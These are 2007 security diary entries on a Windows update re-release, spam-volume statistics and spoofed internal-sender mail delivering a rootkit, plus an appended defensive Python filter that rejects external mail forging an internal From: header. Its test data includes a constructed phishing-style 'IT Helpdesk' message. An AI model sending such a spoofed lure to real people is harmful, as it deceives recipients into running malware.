On June 26th 2007, Microsoft re-released the MS07-022 update for Windows 2000 SP4. This update addresses some problems related to the NEC 98 hardware. For more information related to the issues, please see http://support.microsoft.com/kb/931784/.


Spam volume

Published: 2007-06-26
Last Updated: 2007-06-26 01:28:58 UTC
by Johannes Ullrich (Version: 1)

Today, Robert reported that he is seeing a higher than normal spam volume. We get notes like this rather regularly. Usually it's just a matter of "your turn coming up" in the global spam game. Here are a few URLs I use to check on the global spam volume:

Spamcop http://spamcop.net/spamgraph.shtml?spamstats

Messagelabs: http://www.messagelabs.com/intelligence.asp

Postini: http://www.postini.com/stats


Preventing spoofed internal e-mail

Published: 2007-06-26
Last Updated: 2007-06-26 01:16:20 UTC
by Johannes Ullrich (Version: 1)

Nick submitted a nice piece of malware we are currently looking at. The malware itself includes a rootkit that doesn't appear to be detected by common rootkit tools. However, in my opinion, the delivery method was the noteworthy part: it used a spoofed internal sender. This made me wonder what the best way is to block e-mail that comes from outside mail servers but claims an internal "From:" header.

My first guess would be that this is a great reason to enable SPF. Will this work?  I am assuming that it is a standard policy to require employees to use a VPN connection or "something like that" to send e-mail using an internal mail server.

Any other ideas?
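One caveat worth having in mind when answering the SPF question: SPF (RFC 4408) authorises the SMTP envelope sender (MAIL FROM, or HELO) against the connecting IP, not the "From:" header the user sees, so a message can pass SPF for the attacker's own domain while its header still claims an internal address. As an added example (not part of the diary, and not any particular MTA's configuration), the following Python shows the gateway decision a border MTA or milter would make: reject mail whose header From: is one of our domains unless the session is authenticated, comes from an internal network, or carries our own domain as envelope sender with an SPF pass. The internal domain, the internal networks and the sample message are all assumptions constructed for the example.

```python
import ipaddress
from email import message_from_string
from email.utils import parseaddr

# Assumptions for this example: the domains we own, and the networks our own
# mail servers and VPN clients submit from.
INTERNAL_DOMAINS = {'example.com'}
INTERNAL_NETS = [ipaddress.ip_network('10.0.0.0/8'),
                 ipaddress.ip_network('192.168.0.0/16')]

# Constructed message: the header From: claims the internal helpdesk.
SPOOFED = """\
From: "IT Helpdesk" <helpdesk@example.com>
To: someone@example.com
Subject: Mandatory security update

Please run the attached update before close of business.
"""


def header_from_domain(raw_message):
    """Domain of the RFC 2822 From: header, i.e. what the recipient sees."""
    _, addr = parseaddr(message_from_string(raw_message).get('From', ''))
    return addr.rpartition('@')[2].lower()


def gateway_policy(raw_message, envelope_from, client_ip, authenticated, spf_result='none'):
    """ACCEPT/REJECT decision for one inbound message at the border MTA.

    spf_result is whatever the MTA computed for envelope_from and client_ip.
    It only vouches for the envelope domain: an attacker sending with
    MAIL FROM in their own domain can obtain 'pass' while the From: header
    still claims one of ours, so SPF counts as internal origin only when
    the envelope domain is ours too.
    """
    ip = ipaddress.ip_address(client_ip)
    from_domain = header_from_domain(raw_message)
    envelope_domain = envelope_from.rpartition('@')[2].lower()
    internal_origin = (authenticated
                       or any(ip in net for net in INTERNAL_NETS)
                       or (envelope_domain in INTERNAL_DOMAINS and spf_result == 'pass'))
    if from_domain in INTERNAL_DOMAINS and not internal_origin:
        return 'REJECT', (f'From: claims {from_domain} but the session is external '
                          f'({client_ip}, MAIL FROM {envelope_domain}, SPF {spf_result})')
    return 'ACCEPT', f'From: {from_domain}, MAIL FROM {envelope_domain}, SPF {spf_result}'


if __name__ == '__main__':
    # SPF passes for the attacker's own envelope domain, header From: is forged
    print(gateway_policy(SPOOFED, 'bounce@attacker.invalid', '203.0.113.7', False, 'pass'))
    # same message submitted from inside the VPN range
    print(gateway_policy(SPOOFED, 'helpdesk@example.com', '10.4.2.1', False))
```

The first rule is what actually stops the spoofed-internal-sender delivery described above; publishing an SPF record with -all for example.com helps only for messages whose envelope also claims example.com.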
